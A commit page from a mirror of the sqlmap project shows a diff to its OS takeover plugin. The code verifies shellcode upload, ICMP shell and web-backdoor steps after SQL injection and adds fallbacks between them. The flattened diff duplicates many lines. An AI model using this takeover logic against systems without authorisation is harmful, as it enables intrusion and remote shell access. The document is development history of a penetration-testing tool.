sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-06-08 07:03:10 +03:00
Code Issues Packages Projects Releases Wiki Activity

fixes #396 - adapted the engine to properly verify all steps of takeover were successul, minor code refactoring too

Browse Source
This commit is contained in:
Bernardo Damele 2013-02-14 18:32:22 +00:00
parent 614ff6029d
commit d8942d2ae0
1 changed files with 55 additions and 24 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

67
plugins/generic/takeover.py
View File

@ -15,6 +15,7 @@ from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.enums import DBMS from lib.core.enums import DBMS
from lib.core.enums import OS from lib.core.enums import OS
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges from lib.core.exception import SqlmapMissingPrivileges
@ -86,6 +87,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
def osPwn(self): def osPwn(self):
goUdf = False goUdf = False
fallbackToWeb = False
setupSuccess = False
self.checkDbmsOs() self.checkDbmsOs()
@ -152,10 +155,11 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
self.sysUdfs.pop("sys_bineval") self.sysUdfs.pop("sys_bineval")
self.getRemoteTempPath()
if isStackingAvailable() or conf.direct: if isStackingAvailable() or conf.direct:
web = False web = False
self.getRemoteTempPath()
self.initEnv(web=web) self.initEnv(web=web)
if tunnel == 1: if tunnel == 1:
@ -184,30 +188,50 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
if goUdf: if goUdf:
exitfunc = "thread" exitfunc = "thread"
setupSuccess = True
else: else:
exitfunc = "process" exitfunc = "process"
self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
if not goUdf: if not goUdf:
self.uploadShellcodeexec() setupSuccess = self.uploadShellcodeexec(web=web)
if Backend.isOs(OS.WINDOWS) and conf.privEsc: print "forcing setupSuccess to False"
setupSuccess = False
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL): if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
else:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if Backend.isOs(OS.WINDOWS) and Backend.isDbms(DBMS.MYSQL) and conf.privEsc:
debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate" debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg) logger.debug(debugMsg)
elif tunnel == 2:
self.uploadIcmpshSlave(web=web)
self.icmpPwn()
elif not isStackingAvailable() and Backend.isDbms(DBMS.MYSQL): elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
if setupSuccess is not True:
if Backend.isDbms(DBMS.MYSQL):
fallbackToWeb = True
else:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if not setupSuccess and Backend.isDbms(DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb):
web = True web = True
if fallbackToWeb:
infoMsg = "falling back to web backdoor to establish the tunnel"
else:
infoMsg = "going to use a web backdoor to establish the tunnel" infoMsg = "going to use a web backdoor to establish the tunnel"
logger.info(infoMsg) logger.info(infoMsg)
self.initEnv(web=web) self.initEnv(web=web, forceInit=fallbackToWeb)
if self.webBackdoorUrl: if self.webBackdoorUrl:
if not Backend.isOs(OS.WINDOWS) and conf.privEsc: if not Backend.isOs(OS.WINDOWS) and conf.privEsc:
@ -220,23 +244,30 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
warnMsg += "back-end DBMS underlying system is not Windows" warnMsg += "back-end DBMS underlying system is not Windows"
logger.warn(warnMsg) logger.warn(warnMsg)
self.getRemoteTempPath()
if tunnel == 1: if tunnel == 1:
self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
self.uploadShellcodeexec(web=web) setupSuccess = self.uploadShellcodeexec(web=web)
if setupSuccess is not True:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
elif tunnel == 2:
setupSuccess = self.uploadIcmpshSlave(web=web)
if setupSuccess is not True:
msg = "unable to mount the operating system takeover"
raise SqlmapFilePathException(msg)
if setupSuccess:
if tunnel == 1:
self.pwn(goUdf)
elif tunnel == 2: elif tunnel == 2:
self.uploadIcmpshSlave(web=web)
self.icmpPwn() self.icmpPwn()
else: else:
errMsg = "unable to prompt for an out-of-band session because " errMsg = "unable to prompt for an out-of-band session"
errMsg += "stacked queries SQL injection is not supported"
raise SqlmapNotVulnerableException(errMsg) raise SqlmapNotVulnerableException(errMsg)
if tunnel == 1:
if not web or (web and self.webBackdoorUrl is not None):
self.pwn(goUdf)
if not conf.cleanup: if not conf.cleanup:
self.cleanup(web=web) self.cleanup(web=web)